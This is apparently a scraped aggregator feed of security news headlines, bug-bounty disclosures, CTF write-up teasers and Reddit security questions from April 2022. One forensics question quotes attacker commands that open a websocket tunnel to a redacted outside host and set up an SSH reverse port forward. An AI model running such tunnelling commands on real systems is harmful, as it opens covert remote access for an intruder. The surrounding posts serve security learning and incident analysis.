    Black Box Test on eCPTXv2 exam
    Hi folks, just as I promised, I am sharing my review on eLearnSecurity’s eCPTX exam from an exam taker without purchasing course material… Continue reading on Medium »
  • Open

    Poodle and Doodle, FUD and the Sucuri WAF
    On any given day, Sucuri sees thousands of clients go through the PCI compliance process. The requirements outlined by the Payment Card Industry Data Security Standards (PCI DSS) are mandatory for any website accepting credit card payment, and this process can be very stressful for website owners not familiar with these guidelines. Failure to comply with PCI requirements could result in penalties, large fines, or even lose the ability to take online credit card payments.  Continue reading Poodle and Doodle, FUD and the Sucuri WAF at Sucuri Blog.
  • Open

    April 2022 Git Vulneratibility (CVE-2022-24765) Explained
    Article URL: https://www.youtube.com/watch?v=3Kct--wJARc Comments URL: https://news.ycombinator.com/item?id=31087896 Points: 1 # Comments: 0
  • Open

    GRC Tool that Primarily Focuses on Managing Security Controls
    Hi all. I'd like to ask for a bit of recommendation on which GRC tool to use for an organization. The focus is all about managing security controls (e.g. can the control relate to other policies, other controls, be tagged); Ideally, I'd like to import existing security controls without much manual input if possible and the GRC tool would be a superior option over managing security controls over excel; The GRC tool makes the management of control data easier rather than the status quo. I've currently dived into eramba GRC so far, but I'm afraid for the sophistication of all of the features, the onboarding, and learning curve is a bit high. In addition, it does not seem to check off all of the user friendly requirement in order to have security controls implemented, managed, and audited. My question is, are there any other GRC tools (focus on the management of security controls) that you'd recommend in order to fulfill these points? An on prem solution would be nice, and cost isn't a huge issue. submitted by /u/SimplyMoxie [link] [comments]
    Entry Level Net Sec Career Advice
    Hello, I'm about to graduate with a computer science degree in a few weeks. I've been doing a lot of self teaching using THM and HTB, but I have no formal technical experience other than my degree and a web development internship. My end goal is to become a penetration tester/red teamer, but I have quite a bit to learn before I get there. I'm planning on applying to junior cyber positions in my area, but I've heard it's extremely difficult getting into an entry level position out of college. I was hoping for some insight about what kind of path should I take. Should I go for IT roles before applying to entry level cyber? Should I get Security+ or some other certification before applying? There's a lot of information out there and a lot of options, I just want to make sure that I'm making a smart decision. Thanks! submitted by /u/Lethal_Injections [link] [comments]
    Trying to start a career in Cyber Security.
    I was looking into switching to Cyber Security and NYU Cyber Security Bootcamp keeps popping up. It says its from NYU Professional Studies and they dont accept educational loans which is kind of odd. Has anyone tried there program? And it is legitimate? Seems a lil sus that a university wont take educational loans. submitted by /u/amatsuastray [link] [comments]
  • Open

    A Detailed Guide on HTML Smuggling
    Introduction HTML Smuggling is an evasive payload delivery method that helps an attacker smuggle payload past content filters and firewalls by hiding malicious payloads inside The post A Detailed Guide on HTML Smuggling appeared first on Hacking Articles.
    A Detailed Guide on HTML Smuggling
    Introduction HTML Smuggling is an evasive payload delivery method that helps an attacker smuggle payload past content filters and firewalls by hiding malicious payloads inside The post A Detailed Guide on HTML Smuggling appeared first on Hacking Articles.
  • Open

    $1000: How I could have Hack any account and become a billionaire overnightTop Crypto-Trading….
    After several emails with the security team [ which also includes depression & demotivat] and the HITCON team, the company Continue reading on InfoSec Write-ups »
    My Pentest Log -15- (HTML Injection in Wordpress)
    Greetings Everyone from Thrakion, Continue reading on Medium »
    Bug Bounty Tip 01
    Hello all, today will see one basic bug bounty tip or bug : Continue reading on Medium »
    Account Takeover By Password Reset Function.
    HI, This is Roshan Bhalerav (RBspider) how are you all hope doing great work and making good money. So today I will discuss on my last… Continue reading on Medium »
  • Open

    War in Ukraine / April 18
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Finding Elliot From Mr.Robot
    The other day I talked about the importance of props or objects around a target. But is that a viable option all the time? Let’s see! Continue reading on Medium »
  • Open

    LNK (Ab)use
    I've discussed LNK files a number of times in this blog, and to be honest, I really don't think that this is a subject that gets the attention it deserves. In my experience, and I humbly bow to collection bias here, LNK files are not as well understood as they (sh|c)ould be in the DFIR and CTI fields, which puts defenders at a disadvantage. When I suggest that LNK files aren't really well understood by DFIR and CTI teams, I'm basing that on my own experience with multiple such teams over the years, largely the result of direct interaction. Why is that? Well, the LNK file format is well documented at the MS site, and there have been a number of tools written over the years for parsing these files. I've even gone so far as to create the smallest functioning LNK file, based on the minimum fun…
  • Open

    Need help to Exploit Instagram.
    Can someone find a way to react to a message in dm with text (instead of emoji) and tell me how to do it. Using chrome on laptop. Pleaseeeeeeeeeeee... helpcode #exploit submitted by /u/Old-Imagination8499 [link] [comments]
  • Open

    SecWiki News 2022-04-19 Review
    网络犯罪形态的碎片化与刑事治理的体系化 by ourren 浅析SSRF的各种利用方式 by ourren “蜂巢”恶意代码攻击控制武器平台分析报告 by ourren 数字中国车联网赛题设计思路 by ourren 机器学习如何赋能二进制代码相似性分析 by ourren TP-Link-WDR-7660 安全研究之构造基于串口CMD的调试器 by ourren Go template 遇上 yaml 反序列化 CVE-2022-21701 分析 by ourren 社区合作的威胁情报到底有没有用? by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-19 Review
    网络犯罪形态的碎片化与刑事治理的体系化 by ourren 浅析SSRF的各种利用方式 by ourren “蜂巢”恶意代码攻击控制武器平台分析报告 by ourren 数字中国车联网赛题设计思路 by ourren 机器学习如何赋能二进制代码相似性分析 by ourren TP-Link-WDR-7660 安全研究之构造基于串口CMD的调试器 by ourren Go template 遇上 yaml 反序列化 CVE-2022-21701 分析 by ourren 社区合作的威胁情报到底有没有用? by Avenger 更多最新文章,请访问SecWiki
  • Open

    Invitation Email is resent as a Reminder after invalidating pending email invites
    Mattermost disclosed a bug submitted by mr_anksec: https://hackerone.com/reports/1486820 - Bounty: $150
    xss on [developers.mtn.com]
    MTN Group disclosed a bug submitted by pisarenko: https://hackerone.com/reports/924851
  • Open

    Resolving System Service Numbers using the Exception Directory - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    赠书福利 | 还在寻找渗透秘籍?这本书就够了!
    有没有一本科学、循序渐进、理论与实战结合的“黑客秘籍”呢?
    65.5万美元不翼而飞 黑客从iCloud备份中获取MetaMask种子
    近日,MetaMask应用程序向其iOS用户发布了警告。
    新发现的零点击iPhone漏洞被NSO间谍软件利用
    Citizen Lab的数字威胁研究人员发现了一种新的零点击iMessage漏洞利用。
    新的暗网市场 Industrial Spy 正在出售数据
    一个名为 Industrial Spy 的暗网市场最近异常活跃,正在积极出售或免费提供被盗公司的数据。
    Beanstalk遭攻击损失1.8亿美元,攻击者将25万美元捐给乌克兰
    基于以太坊的稳定币协议Beanstalk Farms遭到了黑客的闪电贷攻击,随后官方承认了这一攻击,宣布暂停一切与合约互动。
    虚假升级网站再现!Win11已成恶意软件的“香饽饽”
    黑客利用Win11升级散步新型恶意软件,窃取受害用户的浏览器数据甚至加密货币钱包。
    连绵不断,Anonymous组织持续对俄发动进攻
    近期,国际知名黑客组织“匿名者”(Anonymous)伙同其他黑客组织发起了对俄罗斯政府机构组织的新一轮攻击。
  • Open

    Vaf Cross-platform Advanced Web Fuzzer
    Continue reading on Medium »
  • Open

    Vaf Cross-platform Advanced Web Fuzzer
    Continue reading on Medium »

  • Open

    Cisco Wireless LAN Controller Interface Authentication Bypass Vulnerability
    Article URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-auth-bypass-JRNhV4fF Comments URL: https://news.ycombinator.com/item?id=31078246 Points: 2 # Comments: 0
    Arbitrary file write vulnerability in GNU gzip's zgrep utility
    Article URL: https://access.redhat.com/security/cve/cve-2022-1271 Comments URL: https://news.ycombinator.com/item?id=31076009 Points: 97 # Comments: 37
  • Open

    Video demonstrating Office VSTO payload delivery (great replacement for macros :) )
    submitted by /u/an0n_r0 [link] [comments]
    Red Team Infrastructure
    Hi everyone it’s been a while since I’ve posted but been a wild ride on Red Team stuff for a while. I wanted too share another part of Red Team Notes that I’ve been working for helping beginners as always! Trying to jump onto this category of hacking, as always enjoy! Please reach out if any errors! https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-infrastructure/red-team-infrastructure submitted by /u/Dmcxblue [link] [comments]
  • Open

    MITRE Engenuity ATT&CK results are out
    submitted by /u/DanielWalker12 [link] [comments]
  • Open

    LUKS encryption
    Reaching out for some help. I’m not familiar at all with Linux. I have an HDD that was ATA password protected. I was able to take it to our state police and they removed it with their Atola. I imaged the drive and found that it’s encrypted with LUKS. I have no memory image as the computer was dropped off at out PD by a reporting party. How/can you get past the LUKS encryption? It’s currently running through Passware as I type this. Case is involving CSAM. submitted by /u/HorseAdministrative7 [link] [comments]
    Research sources for low level forensics?
    So I am working on a challenge last week and an image was taken from a Iphone SIM and using only hex editor we need to find unidentifiable information, location, phone number, carrier and some random information was removed and we need to identify what data is missing. I attempted to research on google but it is almost all casual questions about recovering phone data. I attempted stack overflow and reddit but neither seemed to have any information on the subject. What are some terms or sources I could have used to research this process? What is the stack overflow for forensic professionals. (By the way, I did not win the challenge) submitted by /u/CoreRun [link] [comments]
  • Open

    Stored XSS To Other Users Via Messages
    Welcome back, I hope everyone had a good bank holiday Easter. Continue reading on System Weakness »
    Stored XSS To Other Users Via Messages
    Welcome back, I hope everyone had a good bank holiday Easter. Continue reading on Medium »
    Broken Authentication Login With Google
    Hello Guys! Continue reading on Medium »
    Grow With Us
    Bug Zero is striving to share knowledge among the people and we are keen to promote your voice through our medium. Continue reading on Bug Zero »
    How I got My first Disclosed XSS
    Intro : Continue reading on Medium »
    Hacking the University in a Few Steps
    Escalating a Wrong Date to Get Code Execution Continue reading on Medium »
    Hack Wi-Fi Using Aircrack-ng
    Hello Everyone! In this article I tell you how to hack and crack wifi password using aircrack-ng which is a terminal based tool. Continue reading on Medium »
  • Open

    What's the name of the subject I'm trying to learn about?
    So I'm working my way through the TryHackMe penetration tester course and I'm finding myself lacking a fundamental understanding of things like requests (get/post/etc) and things that I would need to understand before being able to know what anything is with Burpsuite, and I'm having a hard time figuring out what the topic is called that I need to learn more about. For example, Im feeling stuck on PHP file inclusion attacks because I don't understand what Requests actually are, or if there is anything besides get and post. Do I just need to learn how PHP works, or is there a more broad subject that would include that? submitted by /u/GrassyNotes [link] [comments]
    How can one prepare for Attack/Defense CTF's?
    Hey AskNetsec, I'm curious about Attack / Defense CTF's. They seem really exciting but i'm not sure how exactly to prepare for one (because it sometimes involves exploiting services that were made specifically for the competition). What skills do Attack/Defense CTF's train? How can one best prepare for them? Full disclosure, I'm working on a little YT video on Attack/Defense CTF's for my "Learn with Intern" series so this post will help inform that. Here is an example: https://www.youtube.com/watch?v=OVEnPi__I_8 TLDR: What skills do Attack/Defense CTF's train? How can one best prepare for them? submitted by /u/NSP781 [link] [comments]
    Aspiring Junior Penetration Tester Question/Tips
    Hello reddit community. I am an aspiring Junior Pen Tester. I passed the eJPT exam back in November, and I am trying to gain some knowledge towards penetration testing through certifications and TryHackMe/HTB. Right now, I have around 500$ to invest in a certification. My question is the following: ​ After eJPT that I already passed, should I go for eCCPTv2 , CRTP (To gain AD knowledge) or PNPT ? I know that many of you will insist to go for the OSCP. But right now I cannot afford it. What would be the best next step? ​ Thank you very much in advance submitted by /u/apostonikos [link] [comments]
  • Open

    An attacker can archive and unarchive any structured scope object on HackerOne
    HackerOne disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1501611 - Bounty: $12500
    SSRF occurrence in website preview used by LINE Official Account Manager (https://manager.line.biz)
    LINE disclosed a bug submitted by jafarakhondali: https://hackerone.com/reports/1131608 - Bounty: $100
    Deleting someone else's profile image with a GraphQL query in programming education service (https://entry.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/952095 - Bounty: $600
    Use of unreleased features in programming education service (https://entry.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/975428 - Bounty: $100
    SSRF restricted to HTTP/HTML on LINE Social Plugins (https://social-plugins.line.me/)
    LINE disclosed a bug submitted by duahaubadao: https://hackerone.com/reports/860939 - Bounty: $1350
  • Open

    War in Ukraine / April 17
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    TAMU CTF 2022 Writeup — OSINT: Gilberto’s Brother
    This challenge provides little other than a screenshot seen below and the directive to fine birth dates for bothe Gilberto and his unnamed… Continue reading on Medium »
    4 сервіси спостереження за погодними умовами
    ТОП-сервісів для збору метеорологічної інформації, спостереження за атмосферними явищами та прогнозу погоди. Онлайн-мапи клімату й погоди. Continue reading on KR. LABORATORIES IT BLOG »
    Best Chrome extensions for OSINT!
    Let’s try to turn the standard CHROME browser into a full-fledged OSINT explorer tool. Continue reading on Medium »
    Kidnapping of civilians: Russia’s war of intimidation
    The Russian occupation deliberately kidnapped civilians, journalists and politicians in order to break down the Ukrainian resistance in… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-18 Review
    SecWiki周刊(第424期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-18 Review
    SecWiki周刊(第424期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Windows Red Team Cheat Sheet
    Windows for Red Teamers Continue reading on Medium »
  • Open

    CVE-2022-21907 Microsoft HTTP Protocol Stack DoS PoC
    Article URL: https://github.com/polakow/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=31072275 Points: 3 # Comments: 0
  • Open

    Prototype Pollution
    🔍 Introduction Prototype Pollution은 Javascript 처리 로직의 문제로 Object 들의 prototype을 수정할 수 있을 때 발생하는 보안 문제를 의미합니다. Object의 protype을 변경할 수 있는 경우 의도된 로직을 벗어나거나 DOM에 관여하여 XSS 등의 추가적인 문제를 발생시킬 수 있습니다. 1 2 3 4 5 6 7 8 9 let myObj = {} myObj['__proto__']['a'] = 'a’ // myObj의 prototype(__proto__) 의 a에 a를 넣습니다. console.log(myObj.a) let newObj = {} // 이후 newObj라는 Object를 만들었는데, // log를 보면 a가 찍힙니다.
  • Open

    How Mobile Operators should Thousands of Dollars because of SMS Malware.
    No content preview
  • Open

    How Mobile Operators should Thousands of Dollars because of SMS Malware.
    No content preview
  • Open

    How Mobile Operators should Thousands of Dollars because of SMS Malware.
    No content preview
  • Open

    FreeBuf早报 | GitHub封锁两家大型俄银行账户;金融平台漏洞或致银行信息泄露
    作为美国实施封锁制裁的一部分,GitHub已开始暂停俄罗斯注册用户的帐户,并封锁俄罗斯金融机构的账户。
    新型DDoS攻击泛滥: 利用中间盒的TCP反射放大攻击分析
    攻击者可以利用部分网络中间盒在TCP会话识别上的漏洞,实现一种全新的DDoS反射放大攻击。
    新型DDoS攻击泛滥: 利用中间盒的TCP反射放大攻击分析
    攻击者可以利用部分网络中间盒在TCP会话识别上的漏洞,实现一种全新的DDoS反射放大攻击。
    GitHub 封禁部分俄罗斯开发者账户
    GitHub 开始屏蔽受美国制裁公司的俄罗斯开发者账户。
    一个月疯狂窃取5.4亿美元,Lazarus Group黑客组织拿钱造导弹
    美国财政部指控黑客组织Lazarus Group3月从Axie Infinity 侧链 Ronin Network疯狂盗窃了5.4亿美元。
    Conti勒索组织声称其对Nordex发动勒索攻击
    近期,德国风力涡轮机制造商Nordex在其官网发布声明称遭受网络攻击。
    GitHub:OAuth 令牌被盗,数十个组织数据被窃
    GitHub 4月15日透露,网络攻击者正使用被盗的 OAuth 用户令牌从其私有存储库下载数据。
    企业如何打造“零成本”的安全方案 | FreeBuf甲方社群直播回顾
    4月14日晚间,FreeBuf甲方社群首场内部直播开启。欧普照明集团信息安全负责人樊正懿线上分享企业如何打造“零成本”的安全方案。
    从“零”开始 重铸信任 | CIS零信任安全论坛议题征集开启
    本次论坛FreeBuf邀请了诸多网络安全大咖,给参会观众带来更全面、更有价值的议题分享。
  • Open

    CVE-2022-22954 VMware Workspace ONE Access Server-Side Template Injection RCE
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-22954-vmware-workspace-one-access-server-side-template-injection-rce/ 安装环境 r师给的镜像 identity-manager-21.08.0.1-19010796_OVF10.ova,导入ova的时候要设置下fqdn,不然安装时链接数...
    Java 反序列化注入冰蝎内存马相关踩坑笔记
    作者:Y4er 原文链接:https://y4er.com/post/java-deserialization-inject-behinder-memshell-note/ 朋友叫帮忙打一个内存马进去,用的是cb链,无cc依赖,我寻思这不是有手就行吗,谁知道接下来遇到了无数的坑。 改造cb链去除cc依赖 这个是p牛讲过的了,不多说,直接贴代码 public Object getObject(...
    Go template 遇上 yaml 反序列化 CVE-2022-21701 分析
    作者:lazydog 原文链接:http://noahblog.360.cn/go-template-meets-yaml-cve-2022-21701/ 前言 本文对 CVE-2022-21701 istio 提权漏洞进行分析,介绍 go template 遇到 yaml 反序列化两者相结合时造成的漏洞,类似于 “模版注入” 但不是单一利用了模版解析引擎特性,而是结合 yaml 解析后造成...
  • Open

    CVE-2022-22954 VMware Workspace ONE Access Server-Side Template Injection RCE
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-22954-vmware-workspace-one-access-server-side-template-injection-rce/ 安装环境 r师给的镜像 identity-manager-21.08.0.1-19010796_OVF10.ova,导入ova的时候要设置下fqdn,不然安装时链接数...
    Java 反序列化注入冰蝎内存马相关踩坑笔记
    作者:Y4er 原文链接:https://y4er.com/post/java-deserialization-inject-behinder-memshell-note/ 朋友叫帮忙打一个内存马进去,用的是cb链,无cc依赖,我寻思这不是有手就行吗,谁知道接下来遇到了无数的坑。 改造cb链去除cc依赖 这个是p牛讲过的了,不多说,直接贴代码 public Object getObject(...
    Go template 遇上 yaml 反序列化 CVE-2022-21701 分析
    作者:lazydog 原文链接:http://noahblog.360.cn/go-template-meets-yaml-cve-2022-21701/ 前言 本文对 CVE-2022-21701 istio 提权漏洞进行分析,介绍 go template 遇到 yaml 反序列化两者相结合时造成的漏洞,类似于 “模版注入” 但不是单一利用了模版解析引擎特性,而是结合 yaml 解析后造成...
  • Open

    CVE-2022-21882 Win32k内核提权漏洞深入分析
    1、漏洞介绍 2、漏洞影响版本 3、分析环境 4、背景知识 5、漏洞成因 6、利用漏洞的流程 6.1、触发用户态回调 6.2、HOOK回调函数 6.3、修改窗口模式为模式1 6.4、回调返回伪造偏移量 6.5、泄露内核窗口数据结构 6.6、如何布局内存 7、EXP分析调试 8、两种提权方式 8.1、设置token 8.2、修改Privileges 9、补丁分析 10、参考链接 CVE-2022-21882漏洞是Windows系统的一个本地提权漏洞,微软在2022年1月份安全更新中修补此漏洞。本文章对漏洞成因及利用程序进行了详细的分析。 1 漏洞介绍 CVE-2022-21882是对CVE-2021-1732漏洞的绕过,属于win32k驱动程序中的一个类型混淆漏洞。 攻击者可以在user_mode调用相关的GUI API进行内核调用,如xxxMenuWindowProc、xxxSBWndProc、xxxSwitchWndProc、xxxTooltipWndProc等,这些内核函数会触发回调xxxClientAllocWindowClassExtraBytes。攻击者可以通过hook KernelCallbackTable 中 xxxClientAllocWindowClassExtraBytes 拦截该回调,并使用 NtUserConsoleControl 方法设置 tagWNDK 对象的 ConsoleWindow 标志,从而修改窗口类型。 最终回调后,系统不检查窗口类型是否发生变化,由于类型混淆而引用了错误的数据。flag修改前后的区别在于,在设置flag之前,系统认为tagWNDK.pE…

  • Open

    Windows Persistence: Registry Run Keys
    After getting a foothold on a target, the next goal should be to persist on that target. If no persistence method is utilized, then the… Continue reading on Medium »
    CrowSec EdTech Write-Up: Hijacking
    This article is about the CTF (Capture The Flag) called “Hijacking”, where I learned much about new techniques of privillege escalation… Continue reading on Medium »
    The Story of A Simple SentinelOne Hash Blacklist Bypass
    (Originally Posted on 2021–06–02) Continue reading on Medium »
  • Open

    Caught some kind of DNS server running in a local IP. Virus? Spyware?
    Hi everyone, I caught some apps unrelated to each other trying to connect to 10.0.0.241 My local lan is in the 192.168.x.x range so there should be nothing in 10.0.0 Investigated and apparently there's a DNS server I knew nothing about running locally. WTF is this mofo, how do I kill it, is this a sign of some kind of infection? I did an nmap and it showed this: Starting Nmap 7.92 ( https://nmap.org ) at (date and time) Nmap scan report for 10.0.0.241 Host is up (0.029s latency). Not shown: 994 closed tcp ports (conn-refused) PORT STATE SERVICE 53/tcp open domain 389/tcp filtered ldap 636/tcp filtered ldapssl 1099/tcp filtered rmiregistry 3268/tcp filtered globalcatLDAP 3269/tcp filtered globalcatLDAPssl Nmap done: 1 IP address (1 host up) scanned in 23.27 seconds Then I did a traceroute and saw this: traceroute to 10.0.0.241 (10.0.0.241), 64 hops max, 52 byte packets 1 * 10.28.18.1 (10.28.18.1) 33.628 ms 27.414 ms 2 2a28115c3952 (10.0.0.241) 27.610 ms 27.397 ms 31.312 ms submitted by /u/my_humble_chapeau [link] [comments]
    I'm new to Incident Response. Any Tips?
    Hey there, I'm starting to be more involved in our newly formed Incident Response Team. Basically a group of Individuals discussing the further operations after a vuln appears. ​ Do you guys have any Tips ? submitted by /u/No_Bumblebee_5793 [link] [comments]
    My online school is having some kind of cyber attacks on our Zoom classes
    Im running an online school with some paid and unpaid students overseas, including China, and we recently started having attacks that make the Zoom meeting software behave in unusual ways and crash. After I turned off my router (this resets the local IP) the attacks stopped for a few minutes, but then resumed. Today after my PC was off for a long period of time as soon as I started a zoom meeting the program lagged/glitched and crashed, I had to cancel the meeting. I fired up a VPN immediately and restarted, this fixed the problem. My thinking is that if I connect to a specific students computer, we the issue is coming from overseas, that the attacks will start again, and could maybe they could even cause us a problem by getting around the VPN? I’m just one person running a very small bu…
    If Facebook is selling your information
    Then where can I buy it? submitted by /u/zethara [link] [comments]
  • Open

    TryHackMe writeup: Bebop
    No content preview
    THM Writeup: VulnNet Roasted
    No content preview
    Devzat from HackTheBox — Detailed Walkthrough
    No content preview
    Tech_Supp0rt: 1 (Tryhackme)
    No content preview
  • Open

    TryHackMe writeup: Bebop
    No content preview
    THM Writeup: VulnNet Roasted
    No content preview
    Devzat from HackTheBox — Detailed Walkthrough
    No content preview
    Tech_Supp0rt: 1 (Tryhackme)
    No content preview
  • Open

    TryHackMe writeup: Bebop
    No content preview
    THM Writeup: VulnNet Roasted
    No content preview
    Devzat from HackTheBox — Detailed Walkthrough
    No content preview
    Tech_Supp0rt: 1 (Tryhackme)
    No content preview
  • Open

    Ti West’s “X”: an Overrated Throwback
    A work of art or entertainment can have a lot on its mind and under its hood, but if you don’t like it, you don’t like it, and no amount… Continue reading on Fanfare »
    X: Slasher entrega aos fãs de terror o que eles querem
    Novo filme da A24 é um slasher divertido e projeto ambicioso que respeita os dogmas do gênero e brinca com caricaturas da indústria do… Continue reading on Medium »
  • Open

    THCon CTF Writeup - SHA-1 exploitation, PHP LFI and RCE
    submitted by /u/GuyLewin [link] [comments]
    Semgrep rules for smart contracts based on DeFi exploits
    submitted by /u/iterablewords [link] [comments]
    Packets Remystified: Broadcast Brujería
    submitted by /u/0xdea [link] [comments]
    Spock SLAF is a Shared Library for Application Firewall "SLAF". It has the purpose to protect any service that uses the OpenSSL library. The SLAF inserts hooking to intercept all communication to detect security anomalies and block and log attacks.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Web Attack Cheat Sheet
    Discovering Continue reading on Medium »
    Knock Subdomain Scan
    Knock Subdomain Scan v5.3.0 Continue reading on Medium »
    Open Redirection & Broken Link Hijacking
    Let us learn about Open Redirection & Broken Link Hijacking Continue reading on Medium »
    SQL Injection in Harvard’s Subdomain
    Hi there! I’m Bibek Neupane from Nepal. In this first-ever write-up of mine, I’ll try to cover my story of finding a SQL Injection on… Continue reading on Pentester Nepal »
  • Open

    War in Ukraine / April 16
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Where’s Trump?
    Pin Pointing Trump Continue reading on Medium »
    Geo Location From Mr.Robot
    Where’s Elliot? Continue reading on Medium »
    Identification of the owner of Google Docs
    Today we will study the possibility of identifying the owner of Google documents. In the simplest version, you just need to open the file… Continue reading on Medium »
  • Open

    Leveldb File Forensics
    I want to examine the push notifications in a .ldb file. I know I can see the notifications, after some parsing, through a hex editor, but thought there has to be a better way. Does anyone know of a tool to allow me to view/dump the key values for an .ldb file? There's a great writeup from GIAC on how .ldb files work: https://www.giac.org/paper/gcih/20579/google-chrome-notification-analysis-in-depth/128522 But no mention to how to parse the information. I've tried a few GitHub tools without success: https://github.com/google/leveldb -- successfully compiled the tool. This tool seemed the most promising. I tried using the command: ./leveldbutil dump [filename].ldb but received the following error: Corruption: corrupted compressed block contents I don't think the file is corrupted, because when I view the contents in a hex editor, I can read the key-values from the Push Notifications. https://github.com/SuperMarcus/LevelDBViewer/releases - couldn't open the file. https://github.com/markmckinnon/Leveldb-py - couldn't open the file. Any suggestions? edit: Just tried a Python package called Plyvel: https://plyvel.readthedocs.io/en/latest/ >>> import plyvel >>> db = plyvel.DB("006264.ldb", compression=None) Traceback (most recent call last): File "", line 1, in File "plyvel/_plyvel.pyx", line 247, in plyvel._plyvel.DB.__init__ File "plyvel/_plyvel.pyx", line 88, in plyvel._plyvel.raise_for_status plyvel._plyvel.IOError: b'IO error: 006264.ldb/LOCK: Not a directory' >>> ​ submitted by /u/Praxxer1 [link] [comments]
  • Open

    SecWiki News 2022-04-17 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-17 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    [Cullinan #32] Add SSE and Kiterunner!
    Cullinan 로그 #32입니다. SSE와 Kiterunner 페이지를 새롭게 추가했고, threat modeling, ssti, xss, ssrf, oast 페이지에 업데이트가 있었습니다. New Add SSE(Server-Sent Events) Add Kiterunner Update Add resource to cullinan > threat modeling Add tools to cullinan > ssti Add short xss to cullinan > xss Add combined xss to cullinan > xss Add bypass with 20x to cullinan > ssrf Add bypass with toctou to cullinan > ssrf Add dns pinning to cullinan > ssrf Add bypass with ffmpeg to cullinan > ssrf Add bypass techniques to cullinan > oast 그리고 어느정도 데이터가 정리되면, 블로그 내 tag(e.
  • Open

    Some movies (not all checked so NSFW) WARNING VERY SLOW
    Theres several movies in the movie folder, arranged quite weirdly. https://dl3.3rver.org/hex1/ I do not know what are in the other folders submitted by /u/NursingGrimTown [link] [comments]
    Went looking for Moon Knight comics.
    I know at least 1 is a repost. https://archives.eyrie.org/anime/ https://www.greenlittleapple.com/ln/ This one was a bit iffy - it is up and down for me. https://booksdl.org/comics0/_0DAY/0-Day%20Week%20of%202019.09.11/ submitted by /u/ringofyre [link] [comments]
    English & Intl movies, animation, PC games, other stuff
    http://103.152.18.18/Data Kind of slow but functional. submitted by /u/rippleredial [link] [comments]
  • Open

    Cracking Kubernetes RBAC Authorization Model
    This post first appeared as Limiting access to Kubernetes resources with RBAC, which was kindly edited, re-illustrated and exemplified by learnk8s.io, and very friendly to beginners. The version posted here in contrast has a biased focus on the design and implementation, as well as in-depth discussions. TL; DR This post digs into the Kubernetes RBAC authorization (AuthZ) model. Specifically, given technical requirements of granting proper permissions to an application to access kube-apiserver, we’ll introduce concepts like User, ServiceAccount, Subject, Resource, Verb, APIGroup, Rule, Role, RoleBinding etc step by step, and eventually build a RBAC authorization model by our own. Hope that after reading this post, readers will have a deeper understanding on the access control (AuthZ) of kub…

  • Open

    Threat Actor Profile - ALPHV
    submitted by /u/RandyMarsh_Lorde [link] [comments]
  • Open

    business.amazon.com Has a HUGE VULNERABILITY that allows attackers to send emails
    Hi everyone. I made a post about about a weird spoof email I received from business.amazon.com that may hint a possible vulnerability pertaining to the DNS records for business.amazon.com.Post I think someone figured out what is going on with this comment I got the attention of AmazonHelp over at Twitter (Link To AmazonHelp's comment) Update: Here is are some screenshots of how the conversation is going over at Twitter (https://imgur.com/a/ggZSVyk) submitted by /u/possiblyahermit [link] [comments]
    Understanding Port Forwarding Commands
    Hi all, I'm doing some forensics at the moment (...school environment). I just wanted to get some feedback on my interpretation of these commands. I don't have a lot of experience with bouncing traffic around. nohup ./wstunnel -L 8888:localhost:22 ws://w.x.y.z:80 & sleep 2 nohup ssh -o "StrictHostKeyChecking no" -R 2222:localhost:22 -p 8888 -N kali@localhost & First line: No hang-up (persist), start a websocket tunnel that binds to port 8888 on localhost, and forwards to port 22 (moving the communication over SSH). The tunnel destination is w.x.y.z:80, and the command is backgrounded. Last line: No hang-up (persist), and specify that connections to port 2222 on localhost should be forwarded to port 22. Do not execute a remote command (-N) and connect via SSH to kali@localhost (which is a remote attacker, I think. Not sure why it is called "localhost"), and background the command. It's definitely a bit confusing for me to parse. Am I off the mark? submitted by /u/InfamousClyde [link] [comments]
    How do you organise your knowledge on long engagements?
    For CTFs, I use cherrytree for notes, but it doesn't scale to a group. At the company, we use text files (markup) in folders, and regular files in folders. And do a full text index on the whole mess. (Of course some stuff, like bloodhound data, can't be easily indexed) And we can't even agree on folder names. Sometimes you know the host name of a box, sometimes only the IP. Boxes have more than one IP. The same windows box may get a different IP the next day via DHCP. The company may have two 192.168.1.X subnets, that just don't route to each other. (We had a look at dradis & pentest.ws and found them too restrictive/opinionated, but maybe we have to give them another try) - How do you organise your knowledge? - Any workflows or tools that work well? Thanks! submitted by /u/MOVSQ [link] [comments]
    Is network+ and web pentreation testing enough to land an entry job as a pentreation tester ?
    So I finally networked with one guy who works as a manager for a cyber secruity team ,he is one of the best in my country ,a geeky guy who is very familliar with pretty much everything . Under him he has many teams for mobile,iot ,web,and others . He told me that I should have sold knowledge of networks and web , and practise hacking challenges mainly on web pentreation testing ,and machines on hackthebox . I asked him if i should focus on reverse engineering,exploit development . He told me many stuff on that , first is that it requires many understanding on OS, architecure,and compilter theory ,second is that there aren't many jobs in them except in hardware hacking and IOT . But if i want to practise reverse engineering challenges besides Web that is fine . The problem is that i feel …
  • Open

    How to create a Satellite Imagery Time-Lapse: Case Study of Myanmar & the South China Sea.
    A time-lapse is essentially multiple amounts of satellite images over a specific string of time whether that be over weeks or months or… Continue reading on Medium »
    War in Ukraine / April 15
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    OSINT in GitHub…
    Let’s take a look at the main data sources that are used when conducting OSINT research in the GitHub service: Continue reading on Medium »
    OSINT in Discord
